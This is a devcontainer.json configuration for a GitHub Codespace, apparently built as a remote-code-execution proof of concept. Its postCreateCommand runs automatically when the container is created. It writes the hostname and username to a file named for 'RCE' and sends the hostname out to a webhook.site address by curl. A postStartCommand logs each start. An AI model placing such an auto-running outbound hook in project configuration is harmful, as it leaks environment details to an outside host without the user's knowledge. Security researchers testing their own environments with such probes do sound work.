{
  "image": "mcr.microsoft.com/devcontainers/universal:2",
  "postCreateCommand": "echo RCE_VIA_CODESPACE_$(hostname)_$(whoami) > /tmp/codespace_rce.txt && curl -s https://webhook.site/test?rce=$(hostname) || true",
  "postStartCommand": "echo STARTED_$(hostname) > /tmp/codespace_started.txt",
  "features": {
    "ghcr.io/devcontainers/features/docker-in-docker:2": {}
  },
  "forwardPorts": [
    8080
  ],
  "remoteUser": "codespace"
}